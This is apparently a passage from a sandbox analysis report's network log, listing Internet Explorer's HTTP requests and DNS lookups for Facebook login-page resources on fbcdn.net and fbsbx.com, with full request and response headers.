                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Wed, 02 Oct 2024 18:21:08 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: w+FkaEhozfZTItV2a+dvwg==
                                                  X-FB-Debug: wf/nRIiL6PBWOjqipY4MNlAJF3E2dZX3tXTYWzQ2vT/KVonCUhm8NjzlqSn8arGeEc+f+8u2SADHHlkpIxq/cA==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 15219
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/Y0L6f5sxdIV.png
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/png
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  content-md5: hFRfTj3CmfIMC+ZxDLCYWA==
                                                  Expires: Thu, 26 Sep 2024 23:10:22 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  X-FB-Debug: L1vkb0BLXjOzlzguwOeC0FgIcb3VCObxYp1mz1TkbldRtDsNwxShS8JcVlqXmeLYNRbRRZlvggkDm/DxACf+JQ==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 6739
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/yb/r/hLRJ1GG_y0J.ico HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Content-Type: image/x-icon
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  content-md5: jN3KQn2um5Jec0MvhzPgWg==
                                                  Expires: Thu, 03 Oct 2024 23:53:51 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  origin-agent-cluster: ?0
                                                  X-FB-Debug: dOe88OklZEt1oLoGIiJn//A/PHBn/bi88Kr8jxPcphJgPN8OPNY5AaPJcIi0EJtMk9sJ8b0GDLM9dy5HOt5JWw==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 4286
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/5ZTMade4JZA.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yj/r/5ZTMade4JZA.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 05 Oct 2024 18:14:25 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: XaDqqfphLAb5fzpmOlyCJQ==
                                                  X-FB-Debug: HDuEvgLmFIcO29ttLcTurdk9FsGBHU1zMAkehxXN/Z1RYT69HLRibw50Sb0MtYqbr3vdHvmwNG3XikMeXEuumQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 12860
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/FLJXkx8ys-6.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yF/r/FLJXkx8ys-6.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 22:46:04 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: MRbkZP9SId4o1H8vcdRfeg==
                                                  X-FB-Debug: 6FjKoQAijK7rOKhdmQlySTMhp/0cc/YGYpad9ChyB6fs7EW4twa9r5kdozpRB7nJRB13dimxCBHNrsVfRpKPFA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 3217
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3iPwL4/yi/l/en_US/AAnuEkJqILS.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3iPwL4/yi/l/en_US/AAnuEkJqILS.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 18:03:22 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: H3t7Epi+H4mXxMo/NMXUIA==
                                                  X-FB-Debug: EtUAFlFrauf7VW67WdH8bgNFrmk1BPHFWQ2DejJLpRZnYNU2aG9JQkcLRcPjLdwTOBLZy/B5FmjjFHBhLM77kQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 5926
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yG/r/K3qKc0LZC6p.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yG/r/K3qKc0LZC6p.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Mon, 30 Sep 2024 18:22:48 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: 9vN05d9CnDn5o9VAMZLeaQ==
                                                  X-FB-Debug: dEkCsiwrtqsjqlP8j5jYrrdQCVhKipPm/n3aePDO6DOT2flCiynNs5rYtgisbNssUoz8GttRR4aSPuZQ22KjUA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 6764
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yt/r/jIUN0Hn2kpD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 18:32:37 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  origin-agent-cluster: ?0
                                                  content-md5: pl0JqNDekyZ6hCD9BIH9Dw==
                                                  X-FB-Debug: 8UgGcT5vavVB3Y+V19370Rw8tkO9Soed7HDAhE0LqXrErMocaOWvEzpns8QuJYU3dPqPYvy3PWE2vT7prW49QQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 2164
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yc/l/0,cross/1FPNULrhhBJ.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: text/css, */*
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: text/css; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 05 Oct 2024 02:24:58 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: QOLp8E6NtzxxBWhC3gSM/Q==
                                                  X-FB-Debug: lKXe9c2xUsky6sKi4BgSHsUPvlyv1FKtEk0B+GejTd9HSbN2HMK+x2dW0n33oWuDTNP5eGrkTenRjDqSzpkDYg==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 586
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/C7x9HQY1590.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yL/r/C7x9HQY1590.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Thu, 03 Oct 2024 19:28:03 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: ceFGSA/WPFQCTlSAJIMsiw==
                                                  X-FB-Debug: tgLKpfg3+kQhJroGoN+d2ne1tljrasZID4hghZSiE+/qErT0y32Sc966EIlyf2K6Q8q8gLFq/vPaycyvDYZjNw==
                                                  Date: Sat, 07 Oct 2023 12:02:46 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 107850
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yh/r/bpW4eEg-2_W.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sun, 29 Sep 2024 23:27:57 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: p1zId7RIE7NvnWFWeOhZrQ==
                                                  X-FB-Debug: GUuzOus+rq+Roz2/mujuCUmeMuKTjB9eFHyxeh6eVatVelI0g3v1rgirgV3zStOS9ZcFTwg2Vf38hL5JMj35Sw==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 592
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/D8yA-TXiNuk.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yd/r/D8yA-TXiNuk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Sat, 28 Sep 2024 18:02:09 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: /FrrCQV24iVW5vxBJr6cuw==
                                                  X-FB-Debug: K8fU4SXVn3LiafIyWwcya9E6zXmlGwyTlyzY6II+Y3vv+zC3aLeWjHNjb6tbNVOhVsHvryTYs/YTTP4JK8s6gQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 4278
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yf/r/LgvwffuKmeX.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 00:16:45 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: rE6VNnn8bW5M9+1AMZegFA==
                                                  X-FB-Debug: usFtFFQQJSNgqaTaKzrUvzJ1inPkK/PtmDPhfprMWjs5lz+3E+lU0pBZb706/ufz/of+OEKRAOU3unFzXglXjA==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 14668
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3i8JF4/yC/l/en_US/o1mLpHNkgsi.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3i8JF4/yC/l/en_US/o1mLpHNkgsi.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Wed, 02 Oct 2024 06:06:16 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: OaA85XbLEkzw2Lh36vz9WQ==
                                                  X-FB-Debug: 0AUj6QLOqt9epSjYecL3naZ2xoxMBRGV9tm1Mr0n71WAH2rYJ5MsCEB6b5+g42d20JwLf/Rf5BWPklPyJ/cLHw==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 19419
                                                • flag-nl
                                                  GET
                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yZ/r/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.15:443
                                                  Request
                                                  GET /rsrc.php/v3/yZ/r/x4Eyp9nQ1uk.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1
                                                  Accept: application/javascript, */*;q=0.8
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Host: static.xx.fbcdn.net
                                                  Connection: Keep-Alive
                                                  Response
                                                  HTTP/1.1 200 OK
                                                  Vary: Accept-Encoding
                                                  Content-Encoding: gzip
                                                  Content-Type: application/x-javascript; charset=utf-8
                                                  Access-Control-Allow-Origin: *
                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                  Expires: Fri, 04 Oct 2024 00:11:14 GMT
                                                  Cache-Control: public,max-age=31536000,immutable
                                                  document-policy: force-load-at-top
                                                  permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                  cross-origin-resource-policy: cross-origin
                                                  X-Content-Type-Options: nosniff
                                                  timing-allow-origin: *
                                                  content-md5: fg3dEV/JelW6mKZKYUciRA==
                                                  X-FB-Debug: PRVEj/cgHyVS3OjQhldiVsy7B9S0q4/L1KQvJgaYRoRPC0GshM96VubKi0VPghE/Z4dzTb440M/8hlw/y/MvXQ==
                                                  Date: Sat, 07 Oct 2023 12:02:48 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 1296
                                                • flag-us
                                                  DNS
                                                  fbcdn.net
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  fbcdn.net
                                                  IN A
                                                  Response
                                                  fbcdn.net
                                                  IN A
                                                  157.240.201.35
                                                • flag-nl
                                                  GET
                                                  https://fbcdn.net/security/hsts-pixel.gif?c=2
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.35:443
                                                  Request
                                                  GET /security/hsts-pixel.gif?c=2 HTTP/1.1
                                                  Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                  Referer: https://www.facebook.com/login
                                                  Accept-Language: en-US
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                  Accept-Encoding: gzip, deflate
                                                  Connection: Keep-Alive
                                                  Host: fbcdn.net
                                                  Response
                                                  HTTP/1.1 302 Found
                                                  Location: https://fbsbx.com/security/hsts-pixel.gif
                                                  cross-origin-opener-policy: same-origin-allow-popups
                                                  Access-Control-Allow-Origin: *
                                                  Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                  Content-Type: text/html; charset="utf-8"
                                                  X-FB-Debug: 8lvnIHlhgV5XnczXs76ncFoO+hMcmtj9OR+1SFwtAj4LGkm7Coiu+o1sPQK5zMTi7rSQks1KKcWE75NIfkrPLA==
                                                  Date: Sat, 07 Oct 2023 12:02:47 GMT
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  Connection: keep-alive
                                                  Content-Length: 0
                                                • flag-us
                                                  DNS
                                                  fbsbx.com
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  8.8.8.8:53
                                                  Request
                                                  fbsbx.com
                                                  IN A
                                                  Response
                                                  fbsbx.com
                                                  IN A
                                                  157.240.201.35
                                                • flag-nl
                                                  GET
                                                  https://fbsbx.com/security/hsts-pixel.gif
                                                  IEXPLORE.EXE
                                                  Remote address:
                                                  157.240.201.35:443
                                                  Request
                                                  GET /security/hsts-pixel.gif HTTP/1.1
